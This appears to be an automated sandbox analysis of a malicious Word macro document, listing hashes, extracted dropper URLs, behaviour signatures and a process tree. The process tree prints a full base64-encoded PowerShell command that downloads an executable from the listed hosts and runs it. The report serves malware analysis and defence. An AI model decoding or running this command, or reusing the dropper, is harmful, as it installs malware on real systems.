Analysis

  • max time kernel
    106s
  • max time network
    110s
  • platform
    windows7_x64
  • resource
    win7-20220715-en
  • resource tags

    arch:x64arch:x86image:win7-20220715-enlocale:en-usos:windows7-x64system
  • submitted
    24-07-2022 20:49

General

  • Target

    269d5a38bc77f5228031fa16b3b19dea79b6f4095331dc4e6e8edabbd35df36e.doc

  • Size

    221KB

  • MD5

    8b017e9b07cb81cbe36f0df16c47c404

  • SHA1

    b454db93419c926768b004addc427f77ef6c123d

  • SHA256

    269d5a38bc77f5228031fa16b3b19dea79b6f4095331dc4e6e8edabbd35df36e

  • SHA512

    6f322a42c10d417290ca2bfbe23b9c9610711d04fb1c05b5431e567071878c121e26162278ab3ebe922ab80974b4203d056e1b1b1a4e94c3019133c5e7e2ce77

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://uat-essence.oablab.com/cEP88qz

exe.dropper

http://34.207.179.222/GPc2ykD

exe.dropper

http://204.236.197.55/ZmkN6EP

exe.dropper

http://107.23.200.84/EmllsJND2W

exe.dropper

http://radioviverbem.com.br/SZYTAZDa

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 7 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\269d5a38bc77f5228031fa16b3b19dea79b6f4095331dc4e6e8edabbd35df36e.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1136
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:984
    • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLl.exe
      powersheLl -e JABXADcANABfAF8ANQAwAD0AKAAnAG4ANwAyACcAKwAnAF8AMQAnACsAJwA5ACcAKQA7ACQARgBfADQAXwA4ADAAMgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABHADcAMQAwADEAMwBfAF8APQAoACcAaAAnACsAJwB0AHQAJwArACcAcAA6ACcAKwAnAC8AJwArACcALwAnACsAJwB1AGEAdAAtACcAKwAnAGUAJwArACcAcwBzACcAKwAnAGUAbgAnACsAJwBjAGUALgBvAGEAYgBsAGEAYgAuAGMAbwBtAC8AYwBFAFAAOAA4AHEAegBAAGgAdAAnACsAJwB0AHAAOgAvAC8AMwA0AC4AMgAwACcAKwAnADcALgAxADcAOQAuACcAKwAnADIAMgAnACsAJwAyAC8ARwBQACcAKwAnAGMAJwArACcAMgB5AGsAJwArACcARABAAGgAdAB0ACcAKwAnAHAAOgAvAC8AMgAwADQALgAnACsAJwAyADMANgAuADEAOQAnACsAJwA3AC4ANQA1AC8AWgBtAGsATgA2AEUAUABAAGgAdAB0AHAAOgAvAC8AMQAwADcALgAyADMALgAyADAAMAAuADgANAAvAEUAbQBsAGwAcwBKAE4AJwArACcARAAyAFcAQABoAHQAJwArACcAdABwADoALwAnACsAJwAvAHIAYQBkACcAKwAnAGkAbwB2AGkAdgBlAHIAYgBlAG0ALgAnACsAJwBjAG8AJwArACcAbQAuAGIAcgAvAFMAWgBZAFQAQQBaAEQAYQAnACkALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJABwAF8AOAAwADEANgA9ACgAJwBmACcAKwAnADkAMQA1ADUANgAxACcAKwAnADkAJwApADsAJABBADEAMQAwAF8AOQBfAF8AIAA9ACAAKAAnADEANwAnACsAJwA4ACcAKQA7ACQAaQBfADgANQBfAF8AXwAxAD0AKAAnAEYAMQAxADQAOAAnACsAJwBfACcAKwAnAF8AOAAnACkAOwAkAHMAOQA1ADAAOAAxADEAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEEAMQAxADAAXwA5AF8AXwArACgAJwAuAGUAeAAnACsAJwBlACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAGkAMgBfADIAXwAwADgAIABpAG4AIAAkAEcANwAxADAAMQAzAF8AXwApAHsAdAByAHkAewAkAEYAXwA0AF8AOAAwADIALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAaQAyAF8AMgBfADAAOAAsACAAJABzADkANQAwADgAMQAxACkAOwAkAEQANQBfADMAXwAwAF8APQAoACcAVgA3AF8AXwAwACcAKwAnAF8ANQAnACkAOwBJAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAAJABzADkANQAwADgAMQAxACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAANAAwADAAMAAwACkAIAB7AEkAbgB2AG8AawBlAC0ASQB0AGUAbQAgACQAcwA5ADUAMAA4ADEAMQA7ACQAaABfADMANgA3ADEAOAA9ACgAJwBGAF8ANwAxACcAKwAnADIAJwArACcANwBfAF8AJwApADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFIAOQA0AF8AXwAwADEANwA9ACgAJwBUADQAMwAnACsAJwA5ADgAXwAnACkAOwA=
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2024

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/984-58-0x0000000000000000-mapping.dmp

    • memory/984-59-0x000007FEFB9D1000-0x000007FEFB9D3000-memory.dmp

      Filesize

      8KB

    • memory/1136-187-0x0000000070FDD000-0x0000000070FE8000-memory.dmp

      Filesize

      44KB

    • memory/1136-55-0x000000006FFF1000-0x000000006FFF3000-memory.dmp

      Filesize

      8KB

    • memory/1136-56-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1136-57-0x0000000075681000-0x0000000075683000-memory.dmp

      Filesize

      8KB

    • memory/1136-60-0x0000000070FDD000-0x0000000070FE8000-memory.dmp

      Filesize

      44KB

    • memory/1136-191-0x0000000070FDD000-0x0000000070FE8000-memory.dmp

      Filesize

      44KB

    • memory/1136-54-0x0000000072571000-0x0000000072574000-memory.dmp

      Filesize

      12KB

    • memory/1136-190-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2024-185-0x0000000001D24000-0x0000000001D27000-memory.dmp

      Filesize

      12KB

    • memory/2024-186-0x0000000001D2B000-0x0000000001D4A000-memory.dmp

      Filesize

      124KB

    • memory/2024-188-0x0000000001D24000-0x0000000001D27000-memory.dmp

      Filesize

      12KB

    • memory/2024-189-0x0000000001D2B000-0x0000000001D4A000-memory.dmp

      Filesize

      124KB

    • memory/2024-184-0x000007FEF2AF0000-0x000007FEF364D000-memory.dmp

      Filesize

      11.4MB

    • memory/2024-183-0x000007FEF3650000-0x000007FEF4073000-memory.dmp

      Filesize

      10.1MB

    • memory/2024-192-0x0000000001D24000-0x0000000001D27000-memory.dmp

      Filesize

      12KB

    • memory/2024-193-0x0000000001D2B000-0x0000000001D4A000-memory.dmp

      Filesize

      124KB